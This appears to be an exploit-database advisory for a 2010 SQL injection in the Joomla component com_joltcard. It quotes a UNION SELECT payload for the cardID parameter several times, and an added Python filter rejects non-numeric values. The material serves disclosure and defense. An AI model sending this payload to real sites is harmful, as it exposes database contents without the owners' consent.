Vendor: com_joltcard
By: Valentin Hoebel
CVSS: 8,8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: com_joltcard
Affected Version From: unknown
Affected Version To: unknown
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Joomla Component com_joltcard SQL Injection Vulnerability

The vulnerability is a SQL injection in the com_joltcard component for Joomla. The vulnerable parameter is cardID. An example URI is index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--. The selected information is displayed only within the HTML source code of the response (look at the <OBJECT> tag).

Mitigation:

Input validation should be used to prevent SQL injection attacks.
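
One way to apply that validation in front of the component, for example in a request filter or a log review script, shown as an added example that is not part of the original advisory or the component's code. It assumes cardID is meant to be a numeric identifier; the function names, the 10-digit length bound and the sample requests are constructed for illustration, and the third sample is the example URI quoted above.

```python
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_joltcard"   # component named in the advisory
PARAM = "cardID"             # vulnerable parameter named in the advisory


def check_request(uri):
    """Return (verdict, reason) for one request URI.

    Verdicts: "ignore" (other component), "ok", or "reject".
    """
    # parse_qs URL-decodes values, so %XX and '+' encodings are normalised first.
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if COMPONENT not in query.get("option", []):
        return ("ignore", "not a com_joltcard request")
    values = query.get(PARAM, [])
    if not values:
        return ("ok", "no cardID supplied")
    if len(values) > 1:
        # A repeated parameter can make the filter and the application disagree.
        return ("reject", "cardID supplied more than once")
    value = values[0]
    # Strict allow-list (assumption: cardID is numeric): ASCII digits, bounded length.
    if value.isascii() and value.isdigit() and len(value) <= 10:
        return ("ok", "cardID is an integer")
    return ("reject", "cardID is not an integer: %r" % value)


def scan(uris):
    """Return the URIs that should be blocked or alerted on."""
    return [u for u in uris if check_request(u)[0] == "reject"]


# Constructed sample requests; the third is the example URI from the advisory.
SAMPLE_URIS = [
    "/index.php?option=com_joltcard&Itemid=5&task=view&cardID=12",
    "/index.php?option=com_content&view=article&id=3",
    "/index.php?option=com_joltcard&Itemid=XX&task=view"
    "&cardID=X+AND+1=2+UNION+SELECT+concat(database())--",
    "/index.php?option=com_joltcard&task=view&cardID=7&cardID=7%20OR%201",
    "/index.php?option=com_joltcard&task=view&cardID=%31%32",
]

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        print(check_request(uri)[0], uri)
```

A filter like this only narrows what reaches the component; the query that consumes cardID still needs to bind it as a parameter or cast it to an integer.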

Exploit-DB raw data:

# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
# Date: 17.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on: 
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information 
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_joltcard
|:: Vendor = JOLT media
|:: Vendor Website = http://jolt.ca/
|:: Affected Version(s) = unknown
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable Parameter(s) = cardID
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
|:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag). 
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 17.04.2010
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]